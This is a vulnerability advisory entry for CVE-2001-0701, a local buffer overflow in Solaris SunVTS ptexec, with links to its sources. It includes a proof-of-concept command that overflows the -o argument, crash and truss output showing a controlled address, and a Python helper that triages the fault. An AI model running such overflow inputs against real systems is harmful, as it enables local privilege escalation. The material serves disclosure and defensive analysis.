Sun Validation Test Suite ptexec Buffer Overflow Vulnerability


Vulnerability ID: 1106406
Vulnerability type: Buffer overflow
Published: 2001-06-21
Updated: 2005-05-02
CVE ID: CVE-2001-0701
CNNVD ID: CNNVD-200109-119
Platform: Solaris
CVSS score: 7.2
|Vulnerability Source
https://www.exploit-db.com/exploits/20945
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-119
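|Vulnerability Details
A buffer overflow exists in ptexec in Sun Validation Test Suite 4.3 and earlier. A local user can gain elevated privileges by supplying an overly long -o argument.
|Exploit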
source: http://www.securityfocus.com/bid/2898/info

SunVTS is the Sun Validation Test Suite, distributed and maintained by Sun Microsystems. The SunVTS is used to test various components of OEM Sun hardware, and can also be used to stress-test components and sub-components.

A buffer overflow exists in the -o option of the ptexec command. It is possible for a local user to overwrite stack memory, including the return address.

This makes it possible for a local user to gain elevated privileges, and potentially full administrative access. 

# > .sunvts_sec_gss
# /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`
Segmentation Fault (core dumped)

# truss /opt/SUNWvts/bin/ptexec -o `perl -e 'print "A"x400'`

execve("/opt/SUNWvts/bin/ptexec", 0xFFBEFA44, 0xFFBEFA54) argc = 3
stat("/opt/SUNWvts/bin/ptexec", 0xFFBEF780) = 0
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
open("/usr/lib/librpcsvc.so.1", O_RDONLY) = 3
fstat(3, 0xFFBEF518) = 0
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF3A0000

[.....]

sigprocmask(SIG_SETMASK, 0xFF23F010, 0x00000000) = 0
sigaction(SIGSEGV, 0xFFBEE388, 0x00000000) = 0
sigprocmask(SIG_SETMASK, 0xFF24ADE0, 0x00000000) = 0
setcontext(0xFFBEE248)
Incurred fault #6, FLTBOUNDS %pc = 0xFF139FF0
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
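
A triage helper for the truss trace above, added here as an example and not part of the original advisory: it pairs each fault line with its siginfo record and flags a SIGSEGV whose bad address is built entirely from bytes of the supplied argument, which is what addr=0x41414141 ("AAAA") indicates. The function names and the 32-bit address width are assumptions of this example; the sample text is the tail of the trace shown above.

```python
import re

# Constructed sample: the last lines of the truss output shown above.
TRUSS_TAIL = """\
setcontext(0xFFBEE248)
Incurred fault #6, FLTBOUNDS %pc = 0xFF139FF0
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
"""

FAULT_RE = re.compile(r"Incurred fault #(\d+), (\w+)\s+%pc = (0x[0-9A-Fa-f]+)")
SIGINFO_RE = re.compile(r"siginfo: (SIG\w+) (\w+) addr=(0x[0-9A-Fa-f]+)")


def parse_faults(text):
    """Pair each 'Incurred fault' line with the siginfo line that follows it."""
    faults, pending = [], None
    for line in text.splitlines():
        m = FAULT_RE.search(line)
        if m:
            pending = {"fault": m.group(2), "pc": int(m.group(3), 16)}
            continue
        m = SIGINFO_RE.search(line)
        if m and pending is not None:
            pending.update(signal=m.group(1), code=m.group(2),
                           addr=int(m.group(3), 16))
            faults.append(pending)
            pending = None  # the repeated siginfo after "Received signal" is skipped
    return faults


def input_derived(addr, arg_bytes, width=4):
    """True if every byte of the faulting address also occurs in the argument."""
    raw = addr.to_bytes(width, "big")  # assumption: 32-bit addresses, as in the trace
    return 0 not in raw and all(b in arg_bytes for b in raw)


def triage(text, arg_bytes):
    """Return SIGSEGV faults whose bad address is made of bytes from the argument."""
    return [f for f in parse_faults(text)
            if f["signal"] == "SIGSEGV" and input_derived(f["addr"], arg_bytes)]


if __name__ == "__main__":
    for f in triage(TRUSS_TAIL, b"A" * 400):
        print(f"{f['signal']}/{f['code']} at pc={f['pc']:#x}: "
              f"addr={f['addr']:#010x} consists of argument bytes")
```
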
|References

Source: XF
Name: sunvts-ptexec-bo(6736)
Link: http://xforce.iss.net/static/6736.php
Source: BID
Name: 2898
Link: http://www.securityfocus.com/bid/2898
Source: BUGTRAQ
Name: 20010621 Solaris /opt/SUNWvts/bin/ptexec Vulnerability
Link: http://www.securityfocus.com/archive/1/192667
